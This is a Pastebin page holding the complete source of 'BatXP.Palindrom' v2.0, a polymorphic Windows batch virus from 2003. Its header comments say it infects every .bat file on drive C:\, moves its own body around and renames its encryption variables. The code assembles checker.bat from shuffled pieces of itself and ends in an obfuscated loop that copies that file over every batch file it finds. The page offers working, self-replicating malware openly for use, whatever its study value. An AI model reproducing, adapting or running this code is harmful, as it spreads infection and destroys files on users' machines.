API tools faq
paste
FlyFar

Virus.WinXP.Bat.Palindrom.b - Source Code

FlyFar
Jul 3rd, 2023
134
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 7.31 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. @echo off
  2. goto polysta
  3.  
  4. :polysta    %mordnilaP%
  5. ReM Palindrom
  6. ReM ----------- BatXP.Palindom <---> Second Part To Hell[rRlf] -------------------- |Palindrom
  7. ReM                                         |Palindrom
  8. ReM This is BatXP.Palindrom, a polymorph BatXP virus, in it's version 2.0       |Palindrom
  9. ReM It's double polymorph:                              |Palindrom
  10. ReM 1.) It moves the body randomly                          |Palindrom
  11. ReM 2.) It changes the encryption variables                     |Palindrom
  12. ReM I'm sure, that it's the most hightech BatXP virus ever.             |Palindrom
  13. ReM I hope, that you will learn something from the code!                |Palindrom
  14. ReM                                         |Palindrom
  15. ReM *** Information about the virus:                        |Palindrom
  16. ReM VirusName...............BatXP.Palindrom                     |Palindrom
  17. ReM VirusVersion............version 2.0                     |Palindrom
  18. ReM VirusAuthor.............Second Part To Hell[rRlf]               |Palindrom
  19. ReM Infection Way...........It infects every bat-file in every directory        |Palindrom
  20. ReM             at the Drive C:\                    |Palindrom
  21. ReM VirusSize...............7.780 Byte                      |Palindrom
  22. ReM Encrypted...............Yes, but only the Virus-Part                |Palindrom
  23. ReM             It's a "set-encryption".                |Palindrom
  24. ReM Polymorphic.............Yes, two ways:                      |Palindrom
  25. ReM             1.) It moves the body of itself (like BatXP.Saturn) |Palindrom
  26. ReM             2.) It changes the encryption-variable name     |Palindrom
  27. ReM                                         |Palindrom 
  28. ReM Version 2.0 - 30.03.2003:                           |Palindrom
  29. ReM Added the body moving (it was very hard to do)                  |Palindrom
  30. ReM                                         |Palindrom
  31. ReM Version 1.0 - 27.03.2003:                           |Palindrom
  32. ReM Made the virus, encrypt the viruspart and discovered how to change the      |Palindrom
  33. ReM variable names.                                 |Palindrom
  34. ReM                                         |Palindrom
  35. ReM written from 27.03.2003 to 30.03.2003                       |Palindrom
  36. ReM in Austria                                  |Palindrom
  37. ReM ------------------------------------------------------------------------------- |Palindrom
  38. ReM Palindrom
  39. %mordnilaP%set acheck=0
  40. %mordnilaP%set bcheck=0
  41. %mordnilaP%set aaachecker=0
  42. %mordnilaP%set bbbchecker=0
  43. %mordnilaP%set ccchecker=0
  44. %mordnilaP%set dddchecker=0
  45. %mordnilaP%set eeechecker=0
  46. %mordnilaP%set fffchecker=0
  47. %mordnilaP%set gggchecker=0
  48. %mordnilaP%set hhhchecker=0
  49. %mordnilaP%set iiichecker=0
  50. %mordnilaP%set jjjchecker=0
  51. %mordnilaP%set kkkchecker=0
  52. %mordnilaP%set lllchecker=0
  53. %mordnilaP%set mmmchecher=0
  54. %mordnilaP%set nnnchecker=0
  55. %mordnilaP%echo @echo off >checker.bat
  56. %mordnilaP%set crandc=0
  57. :randgen    %mordnilaP%
  58. %mordnilaP%set a=0
  59. %mordnilaP%set counter=0
  60. %mordnilaP%set name=
  61. :stapoly    %mordnilaP%
  62. %mordnilaP%set a=%random%
  63. :polyst     %mordnilaP%
  64. %mordnilaP%if %a% GEQ 50 (set /A a=%a%/3)
  65. %mordnilaP%if %a% LEQ 40 (set /A a=%a%+11)
  66. %mordnilaP%if %a% GEQ 50 (goto polyst)
  67. %mordnilaP%if %a% LSS 41 (goto polyst)
  68. %mordnilaP%set /A a=%a%-40
  69. %mordnilaP%set /A counter=%counter%+1
  70. %mordnilaP%if %a% EQU 1 (set name=%name%P)
  71. %mordnilaP%if %a% EQU 2 (set name=%name%a)
  72. %mordnilaP%if %a% EQU 3 (set name=%name%l)
  73. %mordnilaP%if %a% EQU 4 (set name=%name%i)
  74. %mordnilaP%if %a% EQU 5 (set name=%name%n)
  75. %mordnilaP%if %a% EQU 6 (set name=%name%d)
  76. %mordnilaP%if %a% EQU 7 (set name=%name%r)
  77. %mordnilaP%if %a% EQU 8 (set name=%name%o)
  78. %mordnilaP%if %a% EQU 9 (set name=%name%m)
  79. %mordnilaP%if %counter% LSS 5 goto stapoly
  80. %mordnilaP%set /A crandc=%crandc%+1
  81. %mordnilaP%set name%crandc%=%name%
  82. %mordnilaP%if %crandc% LEQ 13 (goto randgen)
  83. %mordnilaP%goto polystb
  84.  
  85. :polystb        %Palindrom%
  86. %Palindrom%echo @echo off >checker.bat
  87. %Palindrom%echo goto polysta >>checker.bat
  88. :polystbb       %Palindrom%
  89. %Palindrom%set b=%random%
  90. :polystba       %Palindrom%
  91. %Palindrom%set fakewr=P
  92. %Palindrom%if %b% GTR 55 (set /A b=%b%/2)
  93. %Palindrom%if %b% LEQ 40 (set /A b=%b%+15)
  94. %Palindrom%if %b% GTR 55 (goto polystba)
  95. %Palindrom%if %b% LEQ 40 (goto polystba)
  96. %Palindrom%set /A b=%b%-40
  97. %Palindrom%if %b% EQU 1 (if %acheck% NEQ 1 (
  98. %Palindrom%find "mordnila%fakewr%" <%0>>checker.bat
  99. %Palindrom%set acheck=1))
  100. %Palindrom%if %b% EQU 2 (if %aaachecker% NEQ 1 (
  101. %Palindrom%find "%fakewr%aaaa" <%0>>checker.bat
  102. %Palindrom%set aaachecker=1))
  103. %Palindrom%if %b% EQU 3 (if %bbbchecker% NEQ 1 (
  104. %Palindrom%find "%fakewr%bbbb" <%0>>checker.bat
  105. %Palindrom%set bbbchecker=1))
  106. %Palindrom%if %b% EQU 4 (if %ccchecker% NEQ 1 (
  107. %Palindrom%find "%fakewr%cccc" <%0>>checker.bat
  108. %Palindrom%set ccchecker=1))
  109. %Palindrom%if %b% EQU 5 (if %dddchecker% NEQ 1 (
  110. %Palindrom%find "%fakewr%dddd" <%0>>checker.bat
  111. %Palindrom%set dddchecker=1))
  112. %Palindrom%if %b% EQU 6 (if %eeechecker% NEQ 1 (
  113. %Palindrom%find "%fakewr%eeee" <%0>>checker.bat
  114. %Palindrom%set eeechecker=1))
  115. %Palindrom%if %b% EQU 7 (if %fffchecker% NEQ 1 (
  116. %Palindrom%find "%fakewr%ffff" <%0>>checker.bat
  117. %Palindrom%set fffchecker=1))
  118. %Palindrom%if %b% EQU 8 (if %gggchecker% NEQ 1 (
  119. %Palindrom%find "%fakewr%gggg" <%0>>checker.bat
  120. %Palindrom%set gggchecker=1))
  121. %Palindrom%if %b% EQU 9 (if %hhhchecker% NEQ 1 (
  122. %Palindrom%find "%fakewr%hhhh" <%0>>checker.bat
  123. %Palindrom%set hhhchecker=1))
  124. %Palindrom%if %b% EQU 10 (if %iiichecker% NEQ 1 (
  125. %Palindrom%find "%fakewr%iiii" <%0>>checker.bat
  126. %Palindrom%set iiichecker=1))
  127. %Palindrom%if %b% EQU 11 (if %jjjchecker% NEQ 1 (
  128. %Palindrom%find "%fakewr%jjjj" <%0>>checker.bat
  129. %Palindrom%set jjjchecker=1))
  130. %Palindrom%if %b% EQU 12 (if %kkkchecker% NEQ 1 (
  131. %Palindrom%find "%fakewr%kkkk" <%0>>checker.bat
  132. %Palindrom%set kkkchecker=1))
  133. %Palindrom%if %b% EQU 13 (if %lllchecker% NEQ 1 (
  134. %Palindrom%find "%fakewr%llll" <%0>>checker.bat
  135. %Palindrom%set lllchecker=1))
  136. %Palindrom%if %b% EQU 14 (if %bcheck% NEQ 1 (
  137. %Palindrom%find "Palindrom" <%0>>checker.bat
  138. %Palindrom%set bcheck=1))
  139. %Palindrom%if %b% EQU 15 (if %nnnchecker% NEQ 1 (
  140. %Palindrom%find "%fakewr%mmmm" <%0>>checker.bat
  141. %Palindrom%set nnnchecker=1))
  142. %Palindrom%if %acheck% EQU 1 (if %aaachecker% EQU 1 (if %bbbchecker% EQU 1 (if %ccchecker% EQU 1 (
  143. %Palindrom%if %dddchecker% EQU 1 (if %eeechecker% EQU 1 (if %fffchecker% EQU 1 (if %gggchecker% EQU 1 (
  144. %Palindrom%if %hhhchecker% EQU 1 (if %iiichecker% EQU 1 (if %jjjchecker% EQU 1 (if %kkkchecker% EQU 1 (
  145. %Palindrom%if %lllchecker% EQU 1 (if %bcheck% EQU 1 (if %nnnchecker% EQU 1 (
  146. %Palindrom%echo :Pend >>checker.bat
  147. %Palindrom%goto Paaa
  148. %Palindrom%)))))))))))))))
  149. %Palindrom%goto polystbb
  150.  
  151.  
  152.  
  153. :Paaa       %Paaaa%
  154. %Paaaa%echo set %name1%=f>>checker.bat
  155. %Paaaa%goto Pbbb
  156.  
  157. :Pbbb       %Pbbbb%
  158. %Pbbbb%echo set %name2%=o>>checker.bat
  159. %Pbbbb%goto Pccc
  160.  
  161. :Pccc       %Pcccc%
  162. %Pcccc%echo set %name3%=r>>checker.bat
  163. %Pcccc%goto Pddd
  164.  
  165. :Pddd       %Pdddd%
  166. %Pdddd%echo set %name4%=i>>checker.bat
  167. %Pdddd%goto Peee
  168.  
  169. :Peee       %Peeee%
  170. %Peeee%echo set %name5%=n>>checker.bat
  171. %Peeee%goto Pfff
  172.  
  173. :Pfff       %Pffff%
  174. %Pffff%echo set %name6%=b>>checker.bat
  175. %Pffff%goto Pggg
  176.  
  177. :Pggg       %Pgggg%
  178. %Pgggg%echo set %name7%=a>>checker.bat
  179. %Pgggg%goto Phhh
  180.  
  181. :Phhh       %Phhhh%
  182. %Phhhh%echo set %name8%=t>>checker.bat
  183. %Phhhh%goto Piii
  184.  
  185. :Piii       %Piiii%
  186. %Piiii%echo set %name9%=d>>checker.bat
  187. %Piiii%goto Pjjj
  188.  
  189. :Pjjj       %Pjjjj%
  190. %Pjjjj%echo set %name10%=c>>checker.bat
  191. %Pjjjj%goto Pkkk
  192.  
  193. :Pkkk       %Pkkkk%
  194. %Pkkkk%echo set %name11%=p>>checker.bat
  195. %Pkkkk%goto Plll
  196.  
  197. :Plll       %Pllll%
  198. %Pllll%echo set %name12%=y>>checker.bat
  199. %Pllll%goto Pmmm
  200.  
  201. :Pmmm       %Pmmmm%
  202. %Pmmmm%echo %%%name1%%%%%%name2%%%%%%name3%%% /%%%name3%%% C:\ %%%%%%%name3%%% %%%name4%%%%%%name5%%% (*.%%%name6%%%%%%name7%%%%%%name8%%%) %%%name9%%%%%%name2%%% %%%name10%%%%%%name2%%%%%%name11%%%%%%name12%%% %%%name13%%%checker.bat %%%%%%%name3%%% >>checker.bat
  203. %Pmmmm%goto Pend
Tags: batch virus SPTH
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!